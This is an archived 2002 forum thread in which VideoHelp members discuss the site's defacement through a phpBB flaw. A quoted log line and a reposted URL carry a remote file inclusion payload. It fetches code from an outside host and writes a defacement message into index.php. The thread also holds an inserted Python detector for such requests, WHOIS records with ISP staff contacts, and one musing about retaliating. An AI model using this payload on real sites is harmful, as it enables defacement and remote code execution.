VideoHelp Forum




  1. Member
    Join Date
    Jul 2001
    Location
    One Step From Hell
    Tried to get on the site an hour or so ago and it looks like someone hacked it.

    Said something like "Hacked by (SOMEONE's NAME)"

    I sent an email w/ a screenshot to the site admin. Just wanted to know if anyone knows who it was that did the hacking?????

    Thanx
  2. I'm a MEGA Super Moderator Baldrick's Avatar
    Join Date
    Aug 2000
    Location
    Sweden
    Yep, it was hacked and I found this in the log that looks kinda suspicious:
    195.131.85.178 - - [30/Mar/2002:10:09:34 -0600] "GET /includes/db.php?phpbb_root_path=http://mzfk1.narod.ru/&dbms=mysql&phpEx=txt&cmd=echo%20'Hacked%20by%20Mr .X3%20Repair!'%20>%20../index.php HTTP/1.1" 200 166 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
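An added example, not part of any post in this thread: one way to find requests like the logged one in an Apache combined-format access log, by flagging query parameters whose value is an absolute URL or contains shell metacharacters. The names `triage`, `scan` and `SAMPLE` are this example's own, and the second sample line is constructed.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format. The request target can contain raw spaces
# (as the logged line does), so it is matched greedily up to " HTTP/x.y".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) '
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)  # value is an absolute URL
SHELL_META = re.compile(r'[;|&`$<>]')                 # redirection / chaining

def triage(line):
    """Return a finding dict for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m['target'].partition('?')
    params = parse_qsl(query, keep_blank_values=True)  # also percent-decodes
    remote = [k for k, v in params if REMOTE_URL.match(v)]
    shell = [k for k, v in params if SHELL_META.search(v)]
    if not remote and not shell:
        return None
    return {
        'ip': m['ip'], 'time': m['time'], 'path': path,
        'remote_url_params': remote, 'shell_meta_params': shell,
        'served': m['status'] == '200',  # 200: the script answered the request
    }

# Line 1 is the entry quoted in the thread; line 2 is constructed benign traffic.
SAMPLE = [
    '195.131.85.178 - - [30/Mar/2002:10:09:34 -0600] '
    '"GET /includes/db.php?phpbb_root_path=http://mzfk1.narod.ru/'
    "&dbms=mysql&phpEx=txt&cmd=echo%20'Hacked%20by%20Mr .X3%20Repair!'"
    '%20>%20../index.php HTTP/1.1" 200 166 "-" '
    '"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"',
    '203.0.113.7 - - [30/Mar/2002:10:11:02 -0600] '
    '"GET /viewtopic.php?t=1234 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]

def scan(lines):
    """Run triage over an iterable of log lines and keep the findings."""
    return [f for f in map(triage, lines) if f]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

A legitimate redirect-style parameter that carries a URL will also match, so a hit is a lead to review against the script's code rather than proof of compromise.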
  3. I'm a MEGA Super Moderator Baldrick's Avatar
    Join Date
    Aug 2000
    Location
    Sweden
    I found that it is kinda easy to hack this version of phpbb rc2 and lots of users have tried a lot, receive passwords and everything...
  4. Member
    Join Date
    Sep 2001
    Location
    N/A
    My vcd & cvdGuide
  5. Member
    Join Date
    Sep 2001
    Location
    N/A
    Where's the posts thingy gone under people's names as well?

    Baker
    My vcd & cvdGuide
  6. Member
    Join Date
    Feb 2001
    Location
    51`N 5'W #linux & #vcdhelp @ DALnet
    It was just a lame script kiddie by the looks of it.

    Baldrick,
    Try emailing these people. I think it is the attacker's ISP, it's Russian though. Firstly, try emailing abuse@wplus.net and tell them what happened, give them the time it happened and the IP (195.131.85.178, which resolves back to "ip85-178.dialup.wplus.net") - Give them the same details out of the logs that you gave here.
    The only email address I could find on their site was support@wplus.net, so try that as a last resort.
    Can't find out too much more as I don't speak Russian...

    BTW
    Looks like he only has a dialup account so it was probably a dynamic IP: Shame, as I would have liked to have given him a "little surprise" if he had a static IP...
  7. Member
    Join Date
    Feb 2001
    Location
    51`N 5'W #linux & #vcdhelp @ DALnet
    I hope that you have patched it; I think that you have posted the hack...
    LOL
  8. Member
    Join Date
    Sep 2001
    Location
    N/A
    Well, you could use www.translate.ru to translate the Russian-English?

    Baker
    My vcd & cvdGuide
  9. Member
    Join Date
    Jul 2001
    Location
    Maryland
    How do you read IPs?
  10. Member
    Join Date
    Feb 2001
    Location
    51`N 5'W #linux & #vcdhelp @ DALnet
    Originally Posted by baker
    well you could use www.translate.ru to translate the russian-english?

    Baker
    Translating the two URLs just threw back crap, a lot of broken/poor English. I couldn't really make sense of it...

    greg12,
    Learn about DNS and WhoIs queries.
  11. d4n13l, I always wanted to know how to find out a hacker..... how did you find all of that out?????? Is there a site or small tutorial I can read or go to??????
  12. Member
    Join Date
    Feb 2001
    Location
    51`N 5'W #linux & #vcdhelp @ DALnet
    I can't really go into too much detail; the post would be huge, so I will give you the basic steps:
    All you need is an IP to go on. You can see the IP in the log that Baldrick gave - 195.131.85.178. When you resolve that (read what I said to greg12 about doing that), it gives you "ip85-178.dialup.wplus.net". That tells me that the guy's ISP is called "wplus.net" - I confirmed that by opening www.wplus.net in a browser, it was a Russian ISP. The "dialup" part of it leads me to think that it was a dialup account, so it is *probably* a dynamic IP address: So best not try to attack that IP, it could very well be someone else now - Each time the guy dials his ISP he is assigned a different IP. I could try to determine for certain that it was a dynamic IP, but that is another topic...
    As for tutorials, I can't recall any. Just search for some, that's the best way to find them.
    If you are interested in nailing hackers, it would be a good idea to run a firewall (if you are running Windows anyway) - firewalls are a good way to obtain logs of traffic to and from your computer. They also have the benefit of keeping you pretty safe from hackers, if they are configured correctly.

    PS
    "abuse@" is a common email address for reporting abuse to an ISP.
    And I could tell that he was a script kiddie because of the request that he gave the server. It is an easy hack...
  13. For a simple guide on how to trace IP's have a look at this site I put together

    www.traceit.cjb.net
  14. Member
    Join Date
    Jul 2001
    Location
    One Step From Hell
    Here's some info on that IP:

    Code:
    Registrant:
    Webplus Ltd. (WPLUS2-DOM)
       Webplus Ltd., M. Sadovaja, 3/54,
       St.Petersburg, 191186
       RU
    
       Domain Name: WPLUS.NET
    
       Administrative Contact, Technical Contact, Billing Contact:
          WEBPlus DnsMaster  (WP15-ORG)  dnsmaster@WPLUS.NET
          WEBPlus Ltd.
          Kolomenskaja, 29
          St-Petersburg
          RU
          +7 812 3269020
          Fax- +7 812 3269029
    
       Record last updated on 07-Aug-2001.
       Record expires on 12-Aug-2003.
       Record created on 11-Aug-1996.
       Database last updated on 30-Mar-2002 15:11:00 EST.
    
       Domain servers in listed order:
    
       NS.WPLUS.NET			194.8.160.90
       NS1.WPLUS.NET		195.131.52.130
       NS.PU.RU			193.124.85.219
    
    ====================================
    
     195.131.50.0 - 195.131.52.255
    WEBPlus Ltd.
    St.Petersburg
    
    --------------------------------------------------------------------------------
     
     Vladiminr E. Filyunin
    WEBplus Ltd.
    Kolomenskaja 29
    St. Petersburg, Russia 191119
    +7 812 3269020
    +7 812 3269029
    vvph@wplus.net
    
    --------------------------------------------------------------------------------
     
     Michael V. Vasiliev
    ZAO WebPlus, 29 Kolomenskaya
    191119, Saint-Petersburg
    Russia
    +7 812 3269020
    +7 812 3269029
    mikhail@wplus.net
    
    --------------------------------------------------------------------------------
     
     Alexey V. Ushakov
    WEBplus Ltd.
    Kolomenskaja 29
    St. Petersburg, Russia 191119
    +7 812 3269020
    alexey@wplus.net
    
    --------------------------------------------------------------------------------
     
     Alexander I. Phillichev
    WEBplus Ltd.
    Kolomenskaja 29
    St. Petersburg, Russia 191119
    +7 812 3269020
    phil@wplus.net
  15. It was probably former President Yeltsin, that wacky guy will do anything for a laugh.
  16. I'm a MEGA Super Moderator Baldrick's Avatar
    Join Date
    Aug 2000
    Location
    Sweden
    Now I have patched it so it won't be that easy to hack anymore
    try
    http://forum.vcdhelp.com/includes/db.php?phpbb_root_path=http://mzfk1.narod.ru/&dbms=mysql&phpEx=txt&cmd=echo%20'Hacked%20by%20Mr .X3%20Repair!'%20>%20../index.php
  17. Member
    Join Date
    Feb 2001
    Location
    51`N 5'W #linux & #vcdhelp @ DALnet
    LOL, nice one Baldrick.
  18. It seems like someone hacked it again 'cause when I went to vcdhelp.com today there was a "HACKED" sign at the top and there was a face under it.
  19. I think the whole site just got hacked, when going to www.vcdhelp.com I got a weird screen saying it was hacked and then it redirected to the main page
  20. Under the picture, it says it was hacked by 51R PH34R..........
  21. C'mon guys...it looks more like an April Fool, doesn't it?

    Or am I wrong here?
  22. Come on take a look at the calendar.
  23. Member zzyzzx's Avatar
    Join Date
    Aug 2000
    Location
    Baltimore, MD USA
    I think we should ask all VCDHELP regulars who live in St Petersburg to get together and go over to the hacker's place and kick their asses.
  24. 51R PH34R eh????

    Sir Phear, ohhh I'm running out to buy new underwear now!!!
  25. yeah it is still showing that picture and redirecting